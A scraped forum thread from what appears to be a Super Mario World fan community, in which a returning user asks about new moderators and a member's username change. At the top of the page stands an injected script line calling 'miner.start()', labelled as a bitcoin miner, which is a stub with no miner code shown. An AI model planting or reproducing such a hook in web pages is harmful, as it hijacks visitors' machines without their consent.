<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

I'm asking questions since I have not been on here for a while and I think this is the best area to put it since it's

...or in other words: post-whoring
A Confession

I'm asking questions since I have not been on here for a while and I think this is the best area to put it since it's

Postby A Confession » 11 months ago

going to become an irrelevant thread in a while.

My first question is since when did YelseyKing and Bean become mods?

Bean

Re: I'm asking questions

Postby Bean » 11 months ago

Yelsey was in early December if I'm not mistaken since he made a one-off joke about it and was given mod status. I kind of needed it when I was running The Mosts this year to a degree, but what sealed it was ano0maly not voting for me in the Most Likely to Become a Mod in 2018 thread. That was my own personal joke since ano0maly had picked me what seemed like every year. Once that vote didn't happen, I asked to be one in late December, and to also give Yelsey some help.

A Confession

Re: I'm asking questions since I have not been on here for a while and I think this is the best area to put it since it'

Postby A Confession » 11 months ago

Since when/why did redmagemike chanfe their username to redmagesusie?

alleightbits
START PLAY!
First name: Brian

Re: I'm asking questions since I have not been on here for a while and I think this is the best area to put it since it'

Postby alleightbits » 11 months ago

EcstasyData wrote: Since when/why did redmagemike chanfe their username to redmagesusie?
About ten months ago, Red Mage started hormone replacement therapy, and changed her name to match.

Return to “forum games”